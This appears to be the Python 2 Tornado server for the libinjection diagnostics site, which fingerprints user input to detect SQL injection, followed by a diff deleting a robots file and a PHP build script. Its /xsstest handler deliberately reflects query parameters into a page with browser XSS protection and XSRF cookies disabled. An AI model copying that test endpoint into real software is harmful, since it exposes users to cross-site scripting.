import libinjection
except:
pass
from tornado import template
import tornado.httpserver
import tornado.ioloop
import tornado.web
import tornado.wsgi
import tornado.escape
import tornado.options
def breakapart(s):
""" attempts to add spaces in a SQLi so it renders nicely on the webpage
"""
return s.replace(',', ', ').replace('/*',' /*')
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
def chunks(l, n):
""" Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i+n]
def breakify(s):
output = ""
for c in chunks(s, 20):
output += c
if ' ' not in c:
output += ' '
return output
def print_token_string(tok):
"""
returns the value of token, handling opening and closing quote characters
"""
out = ''
if tok.str_open != '\0':
out += tok.str_open
out += tok.val
if tok.str_close != '\0':
out += tok.str_close
return out
def print_token(tok):
"""
prints a token for use in unit testing
"""
out = ''
if tok.type == 's':
out += print_token_string(tok)
elif tok.type == 'v':
vc = tok.count;
if vc == 1:
out += '@'
elif vc == 2:
out += '@@'
out += print_token_string(tok)
else:
out += tok.val
return (tok.type, out)
def alltokens(val, flags):
if flags & libinjection.FLAG_QUOTE_SINGLE:
contextstr = 'single'
elif flags & libinjection.FLAG_QUOTE_DOUBLE:
contextstr = 'double'
else:
contextstr = 'none'
if flags & libinjection.FLAG_SQL_ANSI:
commentstr = 'ansi'
elif flags & libinjection.FLAG_SQL_MYSQL:
commentstr = 'mysql'
else:
raise RuntimeException("bad quote context")
parse = {
'comment': commentstr,
'quote': contextstr
}
args = []
sqlstate = libinjection.sqli_state()
libinjection.sqli_init(sqlstate, val, flags)
count = 0
while count < 25:
count += 1
ok = libinjection.sqli_tokenize(sqlstate)
if ok == 0:
break
args.append(print_token(sqlstate.current))
parse['tokens'] = args
args = []
fingerprint = libinjection.sqli_fingerprint(sqlstate, flags)
for i in range(len(sqlstate.fingerprint)):
args.append(print_token(libinjection.sqli_get_token(sqlstate,i)))
parse['folds'] = args
parse['sqli'] = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
parse['fingerprint'] = fingerprint
# todo add stats
return parse
class PageHandler(tornado.web.RequestHandler):
def get(self, pagename):
if pagename == '':
pagename = 'home'
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render(
pagename + '.html',
title = pagename.replace('-',' '),
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
class XssTestHandler(tornado.web.RequestHandler):
def get(self):
settings = self.application.settings
ldr = template.Loader(".")
args = ['', '', '', '', '', '', '', '', '', '']
qsl = [ x.split('=', 1) for x in self.request.query.split('&') ]
for kv in qsl:
print kv
try:
index = int(kv[0])
val = tornado.escape.url_unescape(kv[1])
print "XXX", index, val
args[index] = val
except Exception,e:
print e
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.write(ldr.load('xsstest.html').generate(args=args))
class DaysSinceHandler(tornado.web.RequestHandler):
def get(self):
lastevasion = datetime.date(2013, 9, 12)
today = datetime.date.today()
daynum = (today - lastevasion).days
if daynum < 10:
days = "00" + str(daynum)
elif daynum < 100:
days = "0" + str(daynum)
else:
days = str(daynum)
self.render(
"days-since-last-bypass.html",
title='libinjection: Days Since Last Bypass',
days=days,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
class NullHandler(tornado.web.RequestHandler):
def get(self):
arg = self.request.arguments.get('type', [])
if len(arg) > 0 and arg[0] == 'tokens':
return self.get_tokens()
else:
return self.get_fingerprints()
def get_tokens(self):
ids = self.request.arguments.get('id', [])
if len(ids) == 1:
formvalue = ids[0]
else:
formvalue = ''
val = urllib.unquote(formvalue)
parsed = []
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL))
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render("tokens.html",
title='libjection sqli token parsing diagnostics',
version = libinjection.version(),
parsed=parsed,
formvalue=val,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
def get_fingerprints(self):
#unquote = urllib.unquote
#detectsqli = libinjection.detectsqli
ids = self.request.arguments.get('id', [])
if len(ids) == 1:
formvalue = ids[0]
else:
formvalue = ''
args = []
extra = {}
qssqli = False
sqlstate = libinjection.sqli_state()
allfp = {}
for name,values in self.request.arguments.iteritems():
if name == 'type':
continue
fps = []
val = values[0]
val = urllib.unquote(val)
if len(val) == 0:
continue
libinjection.sqli_init(sqlstate, val, 0)
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['unquoted', 'ansi', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['unquoted', 'mysql', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['single', 'ansi', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['single', 'mysql', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['double', 'mysql', issqli, pat])
allfp[name] = {
'value': breakify(breakapart(val)),
'fingerprints': fps
}
for name,values in self.request.arguments.iteritems():
if name == 'type':
continue
for val in values:
# do it one more time include cut-n-paste was already url-encoded
val = urllib.unquote(val)
if len(val) == 0:
continue
# swig returns 1/0, convert to True False
libinjection.sqli_init(sqlstate, val, 0)
issqli = bool(libinjection.is_sqli(sqlstate))
# True if any issqli values are true
qssqli = qssqli or issqli
val = breakapart(val)
pat = sqlstate.fingerprint
if not issqli:
pat = 'see below'
args.append([name, val, issqli, pat])
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render("form.html",
title='libjection sqli diagnostic',
version = libinjection.version(),
is_sqli=qssqli,
args=args,
allfp = allfp,
formvalue=formvalue,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
import os
settings = {
"static_path": os.path.join(os.path.dirname(__file__), "static"),
"template_path": os.path.join(os.path.dirname(__file__), "."),
"xsrf_cookies": False,
"gzip": False
}
application = tornado.web.Application([
(r"/diagnostics", NullHandler),
(r'/xsstest', XssTestHandler),
(r'/bootstrap/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/bootstrap' }),
(r'/jquery/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/jquery' }),
(r'/robots.txt', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
(r'/favicon.ico', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
(r"/([a-z-]*)", PageHandler)
], **settings)
if __name__ == "__main__":
tornado.options.parse_command_line()
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s %(process)d %(message)s")
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()

Binary file not shown.


Binary file not shown.


Binary file not shown.



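--- a/robots.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-User-agent: *
-Disallow: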


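--- a/config.m4
+++ /dev/null
@@ -1,13 +0,0 @@
-dnl based on
-dnl http://www.php.net/manual/en/internals2.buildsys.configunix.php
-PHP_ARG_ENABLE(libinjection, for libinjection support,
-[ --enable-libinjection Include libinjection])
-dnl Check whether the extension is enabled at all
-if test "$PHP_LIBINJECTION" != "no"; then
-dnl Finally, tell the build system about the extension and what files are needed
-PHP_NEW_EXTENSION(libinjection, libinjection_sqli.c libinjection_wrap.c, $ext_shared)
-PHP_SUBST(LIBINJECTION_SHARED_LIBADD)
-fi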
